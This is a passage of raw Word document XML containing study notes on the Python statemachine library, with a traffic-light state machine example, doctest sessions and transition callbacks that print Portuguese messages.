        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        def check_sneakers(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44F23E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E084B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6101EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    establish_mongo_connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093FBC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    runner = Runner()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182DCAFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    runner.save()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD14EBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    assert runner.is_sleeping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC661AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    runner.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E32D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    assert runner.is_sleeping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54105743" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    assert not runner.is_running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F08F4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B5DD94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60024C7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="OLE_LINK16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="533D0318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from statemachine import StateMachine, State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC8596" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038DAB7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class TrafficLightMachine(StateMachine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF834F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    green = State('Green', initial=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091408A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    yellow = State('Yellow')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C8EF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    red = State('Red')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71255838" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B648EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    slowdown = green.to(yellow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C181A7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    stop = yellow.to(red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD1350" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go = red.to(green)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779ABF19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A21686" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; class MyModel(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346D0A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>...     def __init__(self, state):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF2C1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>...         self.state = state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270B92FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021236C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; obj = MyModel(state='red')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBF504" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; traffic_light = TrafficLightMachine(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E835EF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; traffic_light.is_red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE0EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9D038" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; obj.state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5CBB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>'red'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4D704" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; obj.state = 'green'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15797C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; traffic_light.is_green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5A3D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8AC8E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; traffic_light.slowdown()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049BAC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; obj.state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E557B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>'yellow'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7221BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; traffic_light.is_yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784D8CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E1075" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A2621" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; class MyModel(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5A0B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def __init__(self, state):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35139FCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.state = state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5E644" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFAF66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj = MyModel(state='red')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B896BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; traffic_light = TrafficLightMachine(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427B19AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; traffic_light.is_red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07945C2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A05CB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj.state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011F827" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'red'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69CCEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj.state = 'green'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E79B5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; traffic_light.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>is_green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FC42E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255F58B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; traffic_light.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>slowdown()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9D7B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj.state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295A25C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'yellow'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41826835" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; traffic_light.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>is_yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4895B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54763934" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D753A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from statemachine import StateMachine, State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26071D25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F5DD91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class TrafficLightMachine(StateMachine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68420EAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "A traffic light machine"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49398DDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    green = State('Green', initial=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400425A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    yellow = State('Yellow')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A259E15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    red = State('Red')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E75BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61674233" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    slowdown = green.to(yellow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163925E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    stop = yellow.to(red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2F2F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    go = red.to(green)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EFCBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3912BBCC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>def on_slowdown(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB527C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Calma, l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13581C91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364C9F06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">   def on_stop(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D736F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Parou.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC24363" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A0138A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def on_go(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761A8885" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Valendo!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F44C07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115902C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from statemachine import StateMachine, State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348A38D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B74193" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
